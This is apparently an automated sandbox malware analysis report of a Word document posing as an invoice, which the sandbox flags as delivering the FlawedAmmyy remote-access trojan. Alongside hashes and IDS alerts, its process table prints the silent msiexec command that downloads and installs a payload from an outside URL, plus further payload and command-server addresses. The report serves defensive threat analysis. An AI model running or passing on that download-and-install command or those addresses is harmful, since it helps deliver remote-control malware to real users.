File name: | 인보이스 18-02-2019.doc |
Full analysis: | https://app.any.run/tasks/8fc66949-ccd7-4a82-8f90-a8e57e7e391b |
Verdict: | Malicious activity |
Threats: | FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics. |
Analysis date: | February 19, 2019, 09:08:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:06:00 2019, Last Saved Time/Date: Mon Feb 18 20:06:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0 |
MD5: | 28FE7E549231AC516A730FB96BEB7069 |
SHA1: | 2B26248B07A1279104A92A13D227CA1A9DE777B6 |
SHA256: | E255C51E4311E02A000FF9BBDA7C385C5FDCB52FACB127C8DB19BDD6FC0CCE6C |
SSDEEP: | 768:IpMLELemEgZnQgW5tmhdMgNMVkLRaEOrlEJ6mhp:ILLemXZQgW5IYgNlHJ6mh |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | 1 |
---|---|
Subject: | - |
Author: | 1 |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | 1 |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:02:18 20:06:00 |
ModifyDate: | 2019:02:18 20:06:00 |
Pages: | 1 |
Words: | 23 |
Characters: | 137 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 159 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | 1 |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\인보이스 18-02-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2304 | "C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://blossomtel.com/~mgarrett456/logo /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1 | C:\Windows\System32\msiexec.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3652 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3820 | "C:\Windows\Installer\MSI9F08.tmp" | C:\Windows\Installer\MSI9F08.tmp | msiexec.exe | |
User: admin Company: IBM Controler' System Security Control Integrity Level: MEDIUM Description: IBM Controler' System Security Control Exit code: 0 Version: 2.8.17228.1 | ||||
2648 | "C:\ProgramData\Microsofts Help\wsus.exe" | C:\ProgramData\Microsofts Help\wsus.exe | MSI9F08.tmp | |
User: admin Company: Microsoft Block Security Integrity Level: MEDIUM Description: Microsoft Block Security Version: 1.18.2.51920 | ||||
3808 | "C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI9F08.tmp >> NUL | C:\Windows\system32\cmd.exe | — | MSI9F08.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3488 | "C:\ProgramData\Microsofts Help\wsus.exe" | C:\ProgramData\Microsofts Help\wsus.exe | — | taskeng.exe |
User: admin Company: Microsoft Block Security Integrity Level: MEDIUM Description: Microsoft Block Security Exit code: 0 Version: 1.18.2.51920 | ||||
3920 | "C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI9F08.tmp >> NUL | C:\Windows\system32\cmd.exe | — | MSI9F08.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR893B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF213BA519081B3882.TMP | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFCA0FAE04E8ACD428.TMP | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF4099F2AB20282341.TMP | — | |
MD5:— | SHA256:— | |||
3652 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF002D1E7F14FE5B1D.TMP | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:01B532AD746A9AEFB4A8ED3F9E756660 | SHA256:C1BC2216A009EC4096A2E5C5AA7EB851D752D56E2EE64FD3524EF42E6A40DAD7 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$이스 18-02-2019.doc | pgc | |
MD5:0239BB8382E546971AF28FF7D0A749CE | SHA256:C68D561623246AB2B23AB4885A23EDD4DB33B647F45E0755C33CCB59604DC933 | |||
3652 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | |
MD5:91219A0536B6EF50DB6758759CD6A2F2 | SHA256:EC13EA2357C6B8E297E4A5993F95B7135F493F5C3C38AC68894D093336B2A2E2 | |||
3820 | MSI9F08.tmp | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\dat1[1].omg | binary | |
MD5:DA80F64698FDCBE7C3284DF94DCCC6F3 | SHA256:1FA3B63B9FD44F2C93B4D513BA33839F56094A2D7886C8E151BB9F11132CF5CD | |||
3652 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFBD0F6213731DE767.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3652 | msiexec.exe | GET | 200 | 107.152.63.32:80 | http://blossomtel.com/~mgarrett456/logo | US | executable | 168 Kb | suspicious |
3820 | MSI9F08.tmp | GET | 200 | 185.17.120.235:80 | http://185.17.120.235/dat1.omg | RU | binary | 657 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3652 | msiexec.exe | 107.152.63.32:80 | blossomtel.com | Blossom Telephone Company | US | suspicious |
3820 | MSI9F08.tmp | 185.17.120.235:80 | — | Leaseweb Deutschland GmbH | RU | suspicious |
2648 | wsus.exe | 185.99.133.2:80 | — | Zappie Host LLC | NZ | malicious |
Domain | IP | Reputation |
---|---|---|
blossomtel.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3652 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3652 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
2648 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] FlawedAmmyy.RAT |
2648 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] AMMYY RAT |
2648 | wsus.exe | A Network Trojan was detected | ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin |
2648 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin |
Process | Message |
---|---|
MSI9F08.tmp | C:\ProgramData\Microsofts Help\template_13de330.DATAHASH |
MSI9F08.tmp | --End Dowload-- |